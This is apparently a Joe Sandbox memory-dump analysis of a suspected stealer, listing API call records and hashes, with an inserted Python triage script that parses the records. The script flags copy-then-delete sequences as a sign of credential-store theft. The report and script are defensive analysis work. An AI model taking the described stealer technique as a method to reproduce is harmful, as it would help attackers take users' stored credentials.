Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpynlstrlenwsprintf
• String ID: %s%s
• API String ID: 1206339513-3252725368
• Opcode ID: 47c29fd494b08b284e4419da2159f97af0b709dbe61064645f8c4def35d972f8
• Instruction ID: 24fbfb8ff3cf0888dee4001b17093da6e45a616e663791e8968d553e0e56daab
• Opcode Fuzzy Hash: 47c29fd494b08b284e4419da2159f97af0b709dbe61064645f8c4def35d972f8
• Instruction Fuzzy Hash: 6CF0823720121A7BEB022B99FC48DAABFADDF557A9F040026F9089A211C771592586E1
APIs
• __getptd.LIBCMT ref: 001A6775
  • Part of subcall function 001A49A4: __getptd_noexit.LIBCMT ref: 001A49A7
  • Part of subcall function 001A49A4: __amsg_exit.LIBCMT ref: 001A49B4
• __getptd.LIBCMT ref: 001A678C
• __amsg_exit.LIBCMT ref: 001A679A
• __lock.LIBCMT ref: 001A67AA
• __updatetlocinfoEx_nolock.LIBCMT ref: 001A67BE
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 2c276793d6806b8766cfc3e5ed18de0e6756e2ce24e5e666ebdf37ed4913ab84
• Instruction ID: 76c31f40f94b09052832f809e2eb33a529de4f649686fe789d27ebb0e417a64b
• Opcode Fuzzy Hash: 2c276793d6806b8766cfc3e5ed18de0e6756e2ce24e5e666ebdf37ed4913ab84
• Instruction Fuzzy Hash: 8DF0B436924710DBDF35BBF8A903B5E33E06F62728F290219F000A71D2CB645940CA96
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 0019006F
  • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC5D
  • Part of subcall function 001AEC48: __CxxThrowException@8.LIBCMT ref: 001AEC72
  • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC83
• __EH_prolog3_catch.LIBCMT ref: 0019010E
• std::_Xinvalid_argument.LIBCPMT ref: 00190122
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
• String ID: vector<T> too long
• API String ID: 2448322171-3788999226
• Opcode ID: 9dd48905545ddf612d41eeda98745df0cfd5e9f45747b54429e4434b7cc2105d
• Instruction ID: 6a3a45a444127105fd8ad1e4d3a2b50ffc515d5ec7048b3d994026cb55d90d26
• Opcode Fuzzy Hash: 9dd48905545ddf612d41eeda98745df0cfd5e9f45747b54429e4434b7cc2105d
• Instruction Fuzzy Hash: 1E31C576A412268FDB1AFFA8EC45AAD7BA9AB19310F11417FF510EB2A0D770C9408B40
APIs
• GetEnvironmentVariableA.KERNEL32(003DEF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0018DADF), ref: 001883F7
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
  • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• SetEnvironmentVariableA.KERNEL32(?,001B7194,003DEF20,001B674E,?,?,?,?,?,?,?,?,0018DADF), ref: 0018844C
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0018DADF), ref: 00188460
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
• String ID: =
• API String ID: 2929475105-1325313214
APIs
• __EH_prolog3_catch.LIBCMT ref: 00196E0F
• lstrlenA.KERNEL32(?,0000001C), ref: 00196E1A
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00196E9E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchlstrlen
• String ID: ERROR
• API String ID: 591506033-2861137601
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 0018F257
  • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC5D
  • Part of subcall function 001AEC48: __CxxThrowException@8.LIBCMT ref: 001AEC72
  • Part of subcall function 001AEC48: std::exception::exception.LIBCMT ref: 001AEC83
• std::_Xinvalid_argument.LIBCPMT ref: 0018F262
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
  • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
  • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 1823113695-4289949731
APIs
• GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001922D6,?), ref: 00191D41
• HeapAlloc.KERNEL32(00000000), ref: 00191D48
• wsprintfW.USER32 ref: 00191D59
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                        • String ID: %hs
                                                                                                                                                                        • API String ID: 659108358-2783943728
                                                                                                                                                                        • Opcode ID: 32010abb20970528cf78c92a0c0a87196f52a1d42b7284e17ecd4ac4ac321324
                                                                                                                                                                        • Instruction ID: 9e0bc5ea69c52794822b6c3be33a87b06bee783ebd4d359328103772d205125a
                                                                                                                                                                        • Opcode Fuzzy Hash: 32010abb20970528cf78c92a0c0a87196f52a1d42b7284e17ecd4ac4ac321324
                                                                                                                                                                        • Instruction Fuzzy Hash: 27D05E3234431477C61127D4AC0DB9A3B18DB096E2F000120FA0D95690DB65449447D5
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00181402
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 0018140D
• ReleaseDC.USER32(00000000,00000000), ref: 00181416
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: CapsCreateDeviceRelease
• String ID: DISPLAY
• API String ID: 1843228801-865373369
• Opcode ID: 89af4188b52c2dac8b5b6b493c584c14fefa571eb07e5c5ad77b1bd42511a4c2
• Instruction ID: 48f3a2fc5024b239d427aa81570549c51b2910955093c0adc9d921189b71ce2c
• Opcode Fuzzy Hash: 89af4188b52c2dac8b5b6b493c584c14fefa571eb07e5c5ad77b1bd42511a4c2
• Instruction Fuzzy Hash: 34D012353C430477E1712762BC0EF5B2924D7C9F42F200104F302695D047B014829636
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018B09B
• lstrlenA.KERNEL32(?), ref: 0018B251
• lstrlenA.KERNEL32(?), ref: 0018B26C
• DeleteFileA.KERNEL32(?), ref: 0018B2BE
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
• Opcode ID: 2c7e6be51f161c674b44ca3c6a66302450a20266393f642e04d6fab2b37948e7
• Instruction ID: f35b51552af13006a05e96d6c572f72530c2f7a47290ea4fadf2b59124ef91d4
• Opcode Fuzzy Hash: 2c7e6be51f161c674b44ca3c6a66302450a20266393f642e04d6fab2b37948e7
• Instruction Fuzzy Hash: FB819032D001299BDF02FBA4ED469DDBBB5EF29305F624061F910B7162DB70AE468F91
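The two function records above (the CreateDCA/GetDeviceCaps/ReleaseDC routine at 00181402 and the CopyFileA/lstrlenA/DeleteFileA routine at 0018B09B) are worth reading together: the first queries the display with GetDeviceCaps index 0x0A, which is VERTRES (screen height in pixels), and the second copies a file with bFailIfExists set to TRUE (third argument 00000001), works on the copy, and deletes it. Copying a file before reading it is the usual way a stealer gets at a credential store that the owning application holds open with a sharing lock; on its own the pattern is a heuristic, since installers and backup tools do the same thing. A side observation from the listing: a DC obtained with CreateDCA should be freed with DeleteDC, and the sample calls ReleaseDC instead, which is harmless for triage but a small fingerprint of the code. The script below is an added example (it is not Joe Sandbox output and not part of the report); it parses API lines in the exact format the report prints, decodes the GetDeviceCaps index and the CopyFileA flag, and flags the copy-then-delete sequence. The field names and the heuristic thresholds are this example's own choices, and the sample input is transcribed from the two records above.

```python
"""Triage helper for Joe Sandbox function-level API listings (added example).

Parses lines shaped like
    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00181402
    • Part of subcall function 001904BC: lstrcpyA.KERNEL32(...), ref: 001904E2
and summarises what a stealer-hunting analyst wants from a function record.
Heuristic names (copy_then_delete etc.) are this example's own, not Joe Sandbox fields.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# GetDeviceCaps index constants from wingdi.h.
DEVICE_CAPS = {
    8: "HORZRES",       # screen width in pixels
    10: "VERTRES",      # screen height in pixels (0x0A in the report)
    12: "BITSPIXEL",    # colour depth
    88: "LOGPIXELSX",   # horizontal DPI
    90: "LOGPIXELSY",   # vertical DPI
}

API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int          # address of the call site
    subcall: bool     # True for "Part of subcall function ..." lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API call from a report record; non-API lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), "Part of subcall" in line))
    return calls


def decode_device_caps(calls: List[ApiCall]) -> List[str]:
    """Name the GetDeviceCaps indices the function itself queries (not its callees)."""
    names = []
    for c in calls:
        if c.name == "GetDeviceCaps" and not c.subcall and len(c.args) >= 2:
            idx = int(c.args[1], 16)
            names.append(DEVICE_CAPS.get(idx, f"index_{idx}"))
    return names


def copy_fail_if_exists(calls: List[ApiCall]) -> Optional[bool]:
    """Decode CopyFileA's bFailIfExists flag; None if the function never copies."""
    for c in calls:
        if c.name == "CopyFileA" and not c.subcall and len(c.args) == 3 and c.args[2] != "?":
            return int(c.args[2], 16) != 0
    return None


def copy_then_delete(calls: List[ApiCall]) -> bool:
    """Heuristic: the function copies a file and later deletes one, in call-site order.
    Consistent with copying a locked credential store to read it, then cleaning up."""
    direct = sorted((c for c in calls if not c.subcall), key=lambda c: c.ref)
    names = [c.name for c in direct]
    if "CopyFileA" not in names or "DeleteFileA" not in names:
        return False
    return names.index("CopyFileA") < names.index("DeleteFileA")


def triage(text: str) -> dict:
    """One-line summary of a function record for an analyst's notes."""
    calls = parse_api_lines(text)
    return {
        "direct_calls": [c.name for c in calls if not c.subcall],
        "subcall_count": sum(c.subcall for c in calls),
        "device_caps": decode_device_caps(calls),
        "copy_fail_if_exists": copy_fail_if_exists(calls),
        "copy_then_delete": copy_then_delete(calls),
    }


# Sample input transcribed from the report records for 00181402 and 0018B09B.
DISPLAY_FUNC = """APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00181402
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 0018140D
• ReleaseDC.USER32(00000000,00000000), ref: 00181416
"""

COPY_FUNC = """APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018B09B
• lstrlenA.KERNEL32(?), ref: 0018B251
• lstrlenA.KERNEL32(?), ref: 0018B26C
• DeleteFileA.KERNEL32(?), ref: 0018B2BE
"""

if __name__ == "__main__":
    for label, record in (("00181402", DISPLAY_FUNC), ("0018B09B", COPY_FUNC)):
        print(label, triage(record))
```

Run it against any function record pasted from the report; `triage` keeps direct calls separate from the "Part of subcall" lines so that a string-handling helper shared by many functions does not inflate every caller's score. The `copy_then_delete` flag should be read as a reason to look at the source path argument in the dump, not as a verdict.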
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018B3AC
• lstrlenA.KERNEL32(?), ref: 0018B4FE
• lstrlenA.KERNEL32(?), ref: 0018B519
• DeleteFileA.KERNEL32(?), ref: 0018B56B
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
• Opcode ID: 9a0fe08f66a14cc0214fd0c0d101a1b873afcdfd3a65f5a4b11e5b11d0ab126d
• Instruction ID: 4a1e7e2a21dabfae4e864b8405c0c879ea3a310affe5db26412c302ea927a130
• Opcode Fuzzy Hash: 9a0fe08f66a14cc0214fd0c0d101a1b873afcdfd3a65f5a4b11e5b11d0ab126d
• Instruction Fuzzy Hash: 38719232D00129ABDF02FBA4ED469DDBBB4EF29305F524061F911B7162DB70AE468F91
APIs
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: DecodePointer__getptd_noexit__lock_siglookup
• String ID:
• API String ID: 2847133137-0
• Opcode ID: d9d107a9aae9cb29647081166cb7b48929691d3f860bf324fd3e064544e134be
• Instruction ID: ea4042240f7a1a14c3dacf254f242499f5566a04d5aeaa8b70cf629bc72fa638
• Opcode Fuzzy Hash: d9d107a9aae9cb29647081166cb7b48929691d3f860bf324fd3e064544e134be
• Instruction Fuzzy Hash: 4A419F79D08B05DBCF28DFB8D9846ACB7B2FB67351B25452BE802AB651C7749C40CB60
APIs
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
  • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
  • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
  • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
  • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
  • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
